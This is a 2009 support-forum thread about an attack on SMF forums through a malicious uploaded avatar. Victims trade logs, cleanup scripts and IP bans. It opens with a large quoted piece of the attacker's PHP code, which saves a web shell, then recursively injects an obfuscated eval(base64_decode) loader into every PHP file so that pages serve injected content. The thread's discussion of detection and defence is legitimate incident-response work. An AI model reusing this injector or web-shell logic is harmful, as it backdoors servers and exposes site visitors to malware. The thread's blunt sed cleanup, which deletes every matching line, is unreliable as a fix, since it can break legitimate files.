$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Quote from: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.

Quote from: H on May 06, 2009, 01:13:32 PM
<<< Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

Yeah, lock the windows and leave the door open.

Think I have at least worked out what the injection does.

The <?php eval(base64_decode  <insert value here>
contains an address to a folder in the installation.

In my case it was a theme helios multi template.

From 28th of April, until now, 25mb of files was stored there.
Over 2100 files.

All of which seems to be links to other infected sites which has been injected with commercials. With several commercials in each.
Many of the commercials seems to be flash files, which I haven't tested to run yet, but I downloaded all the files that the hack left and I'm going to inspect those closely.

Not that I will be able to make a difference in sorting out how to fix it, unless you can run a preg_replace and remove <? from files uploaded. But I'm not there yet with my php knowledge, so I'll just continue researching and posting what I find.

He got me today too...I am in the process of restoring a backup (I hope).

I had a member ask if they could get a virus from this code? How do I answer that question.

Thanks,

Wally

Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Quote from: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

Quote from: JBlaze on May 06, 2009, 10:18:04 PM

Quote from: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that ::)

Quote from: Tiribulus on May 06, 2009, 10:24:35 PM

Quote from: JBlaze on May 06, 2009, 10:18:04 PM

Quote from: Tiribulus on May 06, 2009, 08:58:38 PM
Am I correct in assuming that the only way to ban a member name that is not yet registered is to reserve the name?

Or, create an account in that name and ban it.

EUREKA!!!!!

Now why on Earth didn't I think of that ::)

Need to think outside the box :)

Can't the person just come back again using a different name?

I had no idea someone could upload a fake avatar to the default attachments directory and cause this much damage and work. I do now.

SMF 1.1.8

I have the bookmark mod and the donate mod. I think that is it. I have tinymce on another path in a mambo install. That is where the 'avatar' script put the files that infected all of my PHP files on my part of the shared server. The script reported it was looking for the longest path only though not tinymce - see below.

I was trying to figure out what this new 'member' krisbarteo was up to when the forum reported he/she was trying to edit his/her theme. I had already put him/her in a limited group that can't post or pm because of the same Latvian IP address as mentioned above - lots of visitors from Europe IPs lately who have been trying to spam.

Instead of getting a list of themes with how many persons were in each when I accessed them in admin (I have everyone in one theme) I got an output web page 244 pages long in MS Word (when I copied it) of an upload to the mambo directory and a message saying 'injecting PHP files' along with a list of all the PHP files that were changed across all my folders/domains/programs.

ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220' � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH

What a nightmare! My web host security person was able to remove the injected PHP script from the tops of all the PHP files for me thank goodness, but I did not at first know what happened other than the script output I got when I clicked on 'choose themes...' so I knew the problem had originated somehow with SMF. My confidence is battered. I did not know something this 'simple' could bypass so much of the server security, htaccess and folder permissions.

After all the work it will take the rest of the evening to put things to rights, I wonder how likely it is something similar will happen again now? I will definitely disallow uploading their own avatars. Some members won't like that, but it's better than having this happen again.

Can you post that code in code tags?


ÿØÿá�¼Exif��II*� ��� �   � ��� ���1  � ���J���2  � ���f���   � ��� ���i‡ � ���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16� ��� ���0220' � ���515�   � ��� ���   � ��� ��������� �ÿþ 'exploit full path [/home/username/public_html/forum/index.php]
[6910002]
1.0
http://www.greatlakesbass.com/forum/index.php?action=theme;sa=pick;u=-1;sesc=07d0####ddf20ad1792de13df1a8188e
root dir path [/home/username/public_html/]

SYSTEM: Linux servername #.#.##.# #5 SMP Mon Mar 30 04:51:09 CDT 2009 i686 i686 i386 GNU/Linux
MY USER ID: #####; MY GROUP ID: #####; CURRENT USER: username
________________________________________

main script download ok [size: 101417]
[543676657]
shell download ok [size: 62159]
[599387883]
LOOKING FOR THE LONGEST PATH
the longest available path: /home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/
path of main script successfully set [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/]
[5482745]
name of main script successfully set [style.css.php]
[2246876]
relative root dir successfully set [/home/username/public_html/]
[5893301]

my packed size: 0171552
main script path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/style.css.php]
[48839]
shell path [/home/username/public_html/mambopath/mambots/editors/mostlyce/jscripts/tiny_mce/themes/advanced/skins/default/img/s.php]
[58392]
INJECTING PHP FILES
GOTO: /home/username/public_html/
[uid:32148; gid:99; uname:username; gname:nobody] [0750] /home/username/public_html/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/articles/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/
[uid:32148; gid:32150; uname:username; gname:username] [0755] /home/username/public_html/domain/images/
[uid:32148; gid:32150; uname:username; gname:username] [0644] /home/username/public_html/domain/index.php [not patched] [patched]
etc, etc for 244 pages total


Sorry... a little frazzled after today.

Should I be fairly safe if I have image uploads throughout my site disabled for new registers? I disabled uploads on avatars, the gallery and in the ultimate profile mod for them and I don't allow attachments anymore for storage reasons. Is there anything else I should do as precautions?

I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
#!/bin/bash
find /directory_name '*.php' -type f | while read FILE
do
sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Lastly, the forum I run doesn't have any need to entertain visitors from the RIPE Network where the vast majority of attacks come from, so I added denials for all the RIPE Network IP blocks. Since I've done that, we've been clean and the server log is full of denials from the RIPE geographic area. As an afterthought, I pulled the guys referring link from the log and reported him. Probably spoofed, but who knows, I may just get lucky.

I wouldn't really recommend banning the whole RIPE IP area... It is geographically about 25% of the world...

QuoteIt is geographically about 25% of the world...

True - we considered the ramifications, but in the end decided to implement the ban since our forum's subject matter is pretty localized. Not the best choice for everyone I'd venture to say. Draconian measures need to be thought out very carefully as we did.

Quote from: LexArma on May 01, 2009, 12:54:16 PM

Quote from: vHawkeyev on May 01, 2009, 10:47:02 AM
All the php files on my site have been injected with Base64-encoded text that translates to

Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.

i had this hack but it has not been completed, i managed to ban krisbarteo before he finished the job. i have got a lot  of errors in the log.

the user did upload an avatar but it was not an image. the comment for the avatar was JPEG image data, EXIF standard 2.2, comment: "<?php;$url = 'http://wplsat23.n" 

the avatars where in the attachment folder

there was no other SW (that i installed) on the server.

i have put my forum in maintenance mode, although everything still seems to be working alright, as yet i have not started to examine the pages of the forum.

If you get a lot of errors, that's the first sign.

I had 3 errors.
dhah  something
dgobah I think it was and something that looked like it could be a session ID or encryption string.

The avatar starts the chain reaction, if you try to change theme, at least when I tried to, I got a weird error message.

If you check your files you will notice a line on top of most of your php files:
<?php ; /**/ eval(base64_decode('long string here');

If your files doesn't have that string you are most likely alright, however I would pay close attention to error logs, and maybe even to be on the safe side, upload fresh files.

A check towards smf files will give you ?? as version numbers compared to smf original files, so that's another sign of infection as well.

What I had done (perhaps what triggered the infection?)...

Noticed the ad for viagra or something in a post ...
Went and banned the user...(on everything I could)
Removed the post...
Deleted the user... (which also removed the avatar  -  but left the ban in place)
Then, error-log city !

To resolve and protect:
Downloaded the entire site
Removed the injected script from ALL php files (I had some backups)
I have the highest captcha setting, plus added the extra questions
Disabled avatar uploads

Now, clean as a whistle.

Quote from: H on May 06, 2009, 01:13:32 PM

Quote from: MrPhil on May 05, 2009, 11:09:41 PM

Quote from: Tiribulus on May 05, 2009, 06:28:08 PM
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o

I don't think that the intent is to ban setting changes and then open up the door... AFAICT, the intent is simply to get all the PHP cruft out of .htaccess and put it all in one place: php.ini. Why not? It's just that people who are used to putting PHP settings into .htaccess need to keep in mind (when giving advice about PHP setting changes) that not everyone can do it that way. Some people even advise changing httpd.conf, but users on shared servers usually can't change it. Some people still tell others to just change all their permissions to 777 when 1) this is hazardous in some cases and 2) some hosts don't permit this. The bottom line is that you can't just say "change this file", but need to couch it in terms of all the possible places that changes could need to be.

Perhaps there should be some place in this community to point users to when they need to make PHP setting changes. It would discuss the different places and different formats they may encounter on different systems. This entry could also discuss using phpinfo() to see if changes "stick". Another entry could discuss proper permissions needed for various SMF functions, and what to do to change permissions.

All your base64_decode are belong to us!

Heh :P

So is this Krisbarteo a BOT or a real person? Just curious if the anti-SPAM would have caught this...

Thanks,

Wally

Interestingly, I have the Krisbarteo user on a few forums, and he dropped avatars on them, but my forums did not get infected.  I am running the suhosion module for php - were any of the people who did get "hacked" running sohusin?  I have the avatar if anyone is interested.

Quote from: Rumboogy on May 07, 2009, 02:22:41 PM
So is this Krisbarteo a BOT or a real person? Just curious if the anti-SPAM would have caught this...

Thanks,

Wally

So far, the only Anti-Spam mod that whill catch him is the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod as his username, email and IP are reported to the spam blacklist. This mod will catch him if he registers and will prevent posting or anything until admin approval.

I had 4 from the 94.142.*.* range to register before this Krisbarteo situation arose. They all had different email addies and IPs, and I believe they were human. They successfully navigated the "are you human" mod, confirmed their email, and then logged on to the forum. Each time, they were online no more than 5 minutes and logged out.
I thought it was odd that I had 4 from the same range in just a few days, and that they left right after logging on. After this thread started, I realized what was going on. As I stated earlier in this thread, I do not allow anyone but admins to upload an avatar or attachment. I beleive this is what prevented mine from being hacked. They are probably all connected to each other in some way or another.
I banned them all, deleted them, and went a step farther.  I banned the range in htaccess. Now if they or another cohort attempts to return, they get a 404 error page instead of the forum.

Quote from: StarWars Fan on May 07, 2009, 05:23:24 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

[email protected]
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)

http://www.stopforumspam.com/search?q=94.142.128.140

lots of stuff listed onn that IP there.

Indeed, very busy one that one is. :)

Our forum also got 'f.i.t.a.' by Krisbarteo. I actually manually granted this guy access to our forum, not being made suspicious by his name. If only I had been suspicious, I could have saved myself a lot of time right now during exam period at the university...  >:( Actually I was running 1.1.4, if I'm not mistaken, together with a similarly old version of Joomla. Yes, I know, old, but I was supposed to upgrade this summer, before handing over the admin task to a friend of mine.

Also, in our forum, I found the base-64 at the top, and in many .php and .html files I found malicious links to some russian sites that would invariably infect visiting machines with rootkit.hacktool. I believe my machine now also is infected with it and I haven't had the time to rid it of that.

What did I do:
- delete the whole public_html directory on the server
- uploaded my latest backup dating from december 2007 (!)
- carefully adding files from a backup I took after the virus attack (attachments, avatars, updated code)

The site and forum ran again, but only short time after I got messages on my own machine and from forum members that it was trying to infect machines again.

I just got so angry, after having used so much time on this silly virus, but I just must slay it...

So, I deleted all of my files from the server again. Now for some reason I don't even have public_html left so I will have the web hotel restore it again, so I can once more upload my backup from 2007. This time, I will make sure to upgrade both Joomla and SMF to the newest versions before maticulously putting back files from my infected backup.

By the way, I cannot see that Krisbarteo had uploaded any avatar, strangely enough. Must he have done that, in order to spread the virus onto our site, or could he have done it otherwise? Neither does our forum give users the option of changing the template, it is set on the one I made.

When maticulously putting files back from the infected version, apart from the first line containing the base-64 code, what other code should I be wary about? And are there any files in particular that can make the virus spring up again?

There is a number of forum installations reported to be vulnerable to this hack.

I am not sure, but did I miss official opinion from SMF developers on the problem?

Edvard,

Check with your host about a backup.  Typically the host saves a backup at least once a month, so they may be able to restore your site to a set more recent than 2007.

If you were running 1.1.4, there are a number of ways that you could have been infected. That is why it is critical to keep up to date with security releases.

This has got me pretty nervous.

Also, I found this in my referrer file:
Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.

So did someone come up with a sure fire way to prevent this from working, other than disabling avatar uploads?

Quote from: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:

Code Select Expand

Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.

Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

I'd recommend banning the subnet 94.142.128.0/21 which is subnet allocated to the AS number of the Latvian hosting company from which these attacks originate - at your firewall if you can rather than in forums settings. According to their website, it's not an ISP, just a hosting provider, so unless you are expecting other servers to connect to yours....

The hosting company is http://www.cssgroup.lv/?lang=eng

I need some help, I have been hacked by this and just found this tread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key they post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all news ones in and what is causing my pages to go blank now?

Thanks
GrannyD

Quote from: confusion on May 08, 2009, 01:07:26 PM

Quote from: Tiribulus on May 08, 2009, 11:21:03 AM
This has got me pretty nervous.

Also, I found this in my referrer file:

Code Select Expand

Referrer : http://www.google.com.ph/search?q=powered+by+smf+Incandescent+bulb&hl=tl&start=270&sa=N
User Agent : mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.1) gecko/20061010 firefox/2.0
IP Address : http://whois.domaintools.com/120.28.76.113
Date and Time : Thursday 07th May 2009 01:33:05 AM

This IP is from the Philippines and it looks like they're searching for "Powered By SMF" sites which I'm guessing can't be good. I don't know what the rest of the search string is all about though.

Don't be too worried about this.  Someone is trying to link spam their site to other sites that google finds relevant to the term "incandescent bulbs".  It's a common tactic to search for forums to spam that are related to your target keyword.  The "powered by smf" is a good string to find forums that will allow links and are almost always do-follow.

I meant that this topic as a whole has me worried, but I do appreciate the explanation. Still doesn't sound too good though.

It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:


order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all

Quote from: StarWars Fan on May 07, 2009, 05:23:24 PM
Please be advised that this user is also using another alias - something like MagicOPromotion

[email protected]
94.142.128.140
IP address   94.142.128.140
Hostname   Not available
ISP   SIA CSS GROUP hosting
Country   Latvia


He tried registering on my forum, but, I don't allow avatar uploads for new users and I deleted him promptly in any event  8)

Interesting, I had that user on my forum for a while. It took me a few days before I found it and banned the IP, but it never uploaded an avatar. Thankfully!

Quote from: oakview on May 08, 2009, 10:42:24 PM
It's not just this Krisbarteo, there are other aliases being used, and from different IP blocks. I tracked the activity for a couple of days until I had identified all the IP's being used and added them to our .htaccess file. As I mentioned before, the RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest. Since we have blocked most of RIPE, we've not had any issues whatsoever. Shame we have to do that as I'm sure there are many legitimate PC users in RIPE countries. Apologies to them and a pox on the other abusers.

If anyone can use the IP ranges we now block for their own purpose, here they are. Add to, delete from, tweak to suit your own user community needs. It's not terribly organized but so far has been effective:

Code Select Expand


order allow,deny
deny from 62.
deny from 80.
deny from 81.
deny from 82.
deny from 83.
deny from 84.
deny from 85.
deny from 86.
deny from 87.
deny from 88.
deny from 89.
deny from 90.
deny from 91.
deny from 94.
deny from 95.
deny from 109.
deny from 139.10.
deny from 139.12.
deny from 139.16.
deny from 139.18.
deny from 139.24.
deny from 139.28.
deny from 139.30.
deny from 147.83.
deny from 147.84.
deny from 147.91.
deny from 178.
deny from 193.
deny from 194.
deny from 195.
deny from 212.
deny from 213.
deny from 217.
deny from 58.
deny from 59.
deny from 60.
deny from 61.
deny from 165.228.
deny from 165.229.
deny from 168.140.
deny from 202.
deny from 203.
deny from 210.
deny from 211.
deny from 218.
deny from 219.
deny from 220.
deny from 221.
deny from 222.
allow from all

I would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.

OK, since I am getting quite a few PM's from members who are having problems with this hack on their forums, let me make it clear that I DO NOT offer PM support. Any PM's requesting support without my prior consent WILL BE IGNORED/DELETED!

If you wish to recieve support from me regarding this hack, whether it be cleaning it or just pure advice on how to do it yourself, please see my Help Available (http://www.simplemachines.org/community/index.php?topic=302699.0) topic and we will go from there.

I am sorry to sound cranky/senile/whatever... but to be quite honest, it's getting ridiculous. I try my best to offer support when I can and I do have a heart believe it or not. But PM'ing me for support just drives me up a wall. The reason for these forums is so that everyone can see the issue and everyone can provide some help where they can.

So pretty please with lots of sugar on top, do not PM me unless I give you consent to do so. Thank you.

Regards,
JBlaze

QuoteI would consider that to be cutting off the nose to spite the face.  That eliminates practically all of Europe. I have a multinational memberbase, and quite a few are from UK, Norway, Netherlands, Germany, and Sweden.  If your forum is catering locally only, it will suffice, but with overkill.

@busterone - Like I said in my post,

Quotethe RIPE IP blocks are rather heavy-handed and we are OK with that - may not be in everone's best interest.

If you are multi-national as I'm sure many forums are, that approach is not for you. For those that aren't however, it is an option to be considered, carefully considered.

No problem. If it works, it works.  :)

I had this problem too... cleaned everything out and still had problems.  Google led me here and I too had krisbarteo as a member.  Banned and deleted him and everything's back to normal.

Thanks guys :)

Quote from: GrannyD on May 08, 2009, 10:01:55 PM
I need some help, I have been hacked by this and just found this tread tonight. I have been checking php files all day and when I read here that almost all of them have been hacked, I started opening them all and found the code in many.

Now I am having major problems with my website, when I make a post, I get a blank page, but then if I hit my back key they post is there, I tried to put my forum in maintenance mode now and I get a blank page but it is in maintenance mode.. I have been at this since yesterday at 4 when I realized I had been hacked by KrisBarteo at around noon yesterday.

What do I do now, is it better to clean the coding out of the php files or just put all news ones in and what is causing my pages to go blank now?

Thanks
GrannyD

Rather than editing all php files I just replaced all files and folders from a recent backup.
No more errors on the forum.
This should serve as a good reminder to create regular backups.

appears our friend has posted up his tactics all these folks tried to join within a day:

415 marpmayclerax  [email protected] 194.8.75.16 Today at 12:28:03 AM   
416 JeoneeCausa  [email protected] 213.163.65.83 Today at 12:54:40 AM   
417 totonoittee  [email protected] 71.230.120.176 Today at 01:41:29 AM   
418 auditajaw  [email protected] 89.28.3.241 Today at 02:51:53 AM   
419 intitrelf  [email protected] 221.116.142.90 Today at 03:57:37 AM   
420 mamHoaphons  [email protected] 195.2.240.117 Today at 04:07:06 AM   
421 KesBreaphWese  [email protected] 194.8.75.15 Today at 05:52:15 AM   
422 drycletefetle  [email protected] 194.8.75.54 Today at 05:59:14 AM   
423 nupabadoPeeda  [email protected] 194.8.75.42 Today at 06:01:03 AM   
424 ðàñêðóòêà ñàéòîâ  [email protected] 95.220.71.169 Today at 08:00:57 AM   
425 wowgoldstright  [email protected] 89.149.217.184 Today at 08:12:47 AM   
426 guenciede  [email protected] 64.56.73.226 Today at 09:45:28 AM   
427 getapruntee  [email protected] 221.179.6.85 Today at 09:47:13 AM   
